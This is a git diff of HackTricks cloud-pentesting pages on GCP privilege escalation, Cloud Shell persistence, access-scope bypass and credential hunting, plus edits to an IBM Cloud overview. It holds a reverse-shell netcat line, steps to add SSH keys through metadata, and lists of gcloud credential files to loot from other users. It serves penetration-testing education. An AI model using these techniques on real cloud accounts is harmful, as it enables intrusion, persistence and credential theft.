b/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md @@ -16,21 +16,7 @@ Other ways to support HackTricks: ## Modifying the metadata -If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission: - -_**Default service account**_\ -If the service account access **scope** is set to **full access** or at least is explicitly allowing **access to the compute API**, then this configuration is **vulnerable** to escalation. The **default** **scope** is **not** **vulnerable**. - -_**Custom service account**_\ -When using a custom service account, **one** of the following IAM permissions **is** **necessary** to escalate privileges: - -* `compute.instances.setMetadata` (to affect a single instance) -* `compute.projects.setCommonInstanceMetadata` (to affect all instances in the project) - -Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating\_a\_service\_account\_to\_an\_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following **access scopes**: - -* `https://www.googleapis.com/auth/compute` -* `https://www.googleapis.com/auth/cloud-platform` +An attacker with permissions to **modify the instance's metadata** could compromise/escalate to a service account with this permission (which might be restricted by a scope): ### **Add SSH keys to custom metadata** @@ -133,6 +119,9 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes. +# References +* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md index 16c01a5ee7..64f749e725 100644 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md +++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md @@ -55,11 +55,12 @@ nc 443 -e /bin/bash ``` {% hint style="warning" %} -Note that the **first time a GCP action is performed in Cloud Shell that requires authentication**, it **pops up** an authorization window in the user’s browser that must be accepted before the command runs. If an unexpected pop-up comes up, a target could get suspicious and burn the persistence method. - -This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session. +It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used. {% endhint %} +This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session: + +
However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**: diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md index 5713292a2d..109eec37d7 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md @@ -45,23 +45,15 @@ This is how I **test for specific permissions** to perform specific actions insi ## Bypassing access scopes -When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has. - -The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OAuth token** without restriction or to **jump to a different VM less restricted**. - -**Pop another box** - -It's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of `gcloud compute instances list --quiet --format=json`, look for instances with either the specific scope you want or the **`auth/cloud-platform`** all-inclusive scope. - -Also keep an eye out for instances that have the default service account assigned (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`). +Tokens of SA leakded from GCP metadata service have **access scopes**. These are **restrictions** on the **permissions** that the token has. For example, if the token has the **`https://www.googleapis.com/auth/cloud-platform`** scope, it will have **full access** to all GCP services. However, if the token has the **`https://www.googleapis.com/auth/cloud-platform.read-only`** scope, it will only have **read-only access** to all GCP services even if the SA has more permissions in IAM. -**Search service account keys** +There is no direct way to bypass these permissions, but you could always try searching for **new credentials** in the compromised host, **find the service key** to generate an OAuth token without restriction or **jump to a different VM less restricted**. -Google states very clearly [**"Access scopes are not a security mechanism… they have no effect when making requests not authenticated through OAuth"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam). +When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has. -Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**. +The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OAuth token** without restriction or to **compromise a different VM with a SA less restricted**. -Check if any service account has exported a key at some point with: +Check SA with keys generated with: ```bash for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do @@ -70,53 +62,6 @@ for i in $(gcloud iam service-accounts list --format="table[no-heading](email)") done ``` -These files are **not stored on a Compute Instance by default**, so you'd have to be lucky to encounter them. The default name for the file is `[project-id]-[portion-of-key-id].json`. So, if your project name is `test-project` then you can **search the filesystem for `test-project*.json`** looking for this key file. - -The contents of the file look something like this: - -```json -{ -"type": "service_account", -"project_id": "[PROJECT-ID]", -"private_key_id": "[KEY-ID]", -"private_key": "-----BEGIN PRIVATE KEY-----\n[PRIVATE-KEY]\n-----END PRIVATE KEY-----\n", -"client_email": "[SERVICE-ACCOUNT-EMAIL]", -"client_id": "[CLIENT-ID]", -"auth_uri": "https://accounts.google.com/o/oauth2/auth", -"token_uri": "https://accounts.google.com/o/oauth2/token", -"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs", -"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/[SERVICE-ACCOUNT-EMAIL]" -} -``` - -Or, if **generated from the CLI** they will look like this: - -```json -{ -"name": "projects/[PROJECT-ID]/serviceAccounts/[SERVICE-ACCOUNT-EMAIL]/keys/[KEY-ID]", -"privateKeyType": "TYPE_GOOGLE_CREDENTIALS_FILE", -"privateKeyData": "[PRIVATE-KEY]", -"validAfterTime": "[DATE]", -"validBeforeTime": "[DATE]", -"keyAlgorithm": "KEY_ALG_RSA_2048" -} -``` - -If you do find one of these files, you can tell the **`gcloud` command to re-authenticate** with this service account. You can do this on the instance, or on any machine that has the tools installed. - -```bash -gcloud auth activate-service-account --key-file [FILE] -``` - -You can now **test your new OAuth token** as follows: - -```bash -TOKEN=`gcloud auth print-access-token` -curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN -``` - -You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions. - ## Privilege Escalation Techniques The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other service account/users/groups privileges. Chaining escalations until you have admin access over the organization. @@ -159,6 +104,7 @@ If you are inside a machine in GCP you might be able to abuse permissions to esc * [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) * [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner) +* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md index 0a50acebd8..9a1a87db60 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md @@ -54,23 +54,19 @@ Check the following permissions: ## Search for Keys in the filesystem -It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this. - -First, find what `gcloud` config directories exist in users' home folders. +Check if other users have loggedin in gcloud inside the box and left their credentials in the filesystem: ``` sudo find / -name "gcloud" ``` -You can manually inspect the files inside, but these are generally the ones with the secrets: +These are the most interesting files: * `~/.config/gcloud/credentials.db` * `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json` * `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto` * `~/.credentials.json` -Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you. - ### More API Keys regexes ```bash diff --git a/pentesting-cloud/ibm-cloud-pentesting/README.md b/pentesting-cloud/ibm-cloud-pentesting/README.md index c899d45749..ca132a3cfd 100644 --- a/pentesting-cloud/ibm-cloud-pentesting/README.md +++ b/pentesting-cloud/ibm-cloud-pentesting/README.md @@ -16,14 +16,15 @@ Other ways to support HackTricks: ## What is IBM cloud? (By chatGPT) -IBM Cloud is a cloud computing platform offered by IBM that provides a suite of cloud services, including infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It provides customers with the ability to deploy and manage applications, store and analyze data, and run virtual machines on the cloud. +IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud. -In comparison to Amazon Web Services (AWS), IBM Cloud provides a similar range of services, but has some differences in terms of offerings and approach. Here are some key differences between IBM Cloud and AWS: +When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches: + +1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele. +2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ. +3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform. +4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud. -1. **Focus**: AWS has a broad range of cloud services, whereas IBM Cloud has a stronger focus on enterprise clients and provides a suite of services tailored for their needs, including security and compliance. -2. **Hybrid Cloud**: IBM Cloud provides a hybrid cloud offering, allowing customers to run applications on both their own on-premises infrastructure and on the IBM Cloud. AWS also provides hybrid cloud solutions, but with a different approach and set of services. -3. **Artificial Intelligence and Machine Learning**: IBM Cloud has a strong focus on artificial intelligence (AI) and machine learning (ML), offering a suite of services in these areas. AWS also provides services in AI and ML, but IBM's offerings are more extensive and integrated with its cloud platform. -4. **Industries**: IBM Cloud has a strong focus on specific industries, including financial services, healthcare, and government, and provides solutions tailored to their needs. AWS provides solutions across a wide range of industries, but may not have the same level of industry-specific offerings as IBM Cloud. ### Basic Information @@ -40,6 +41,8 @@ Learn how you can access the medata endpoint of IBM in the following page: {% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0" %} +# References +* [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.)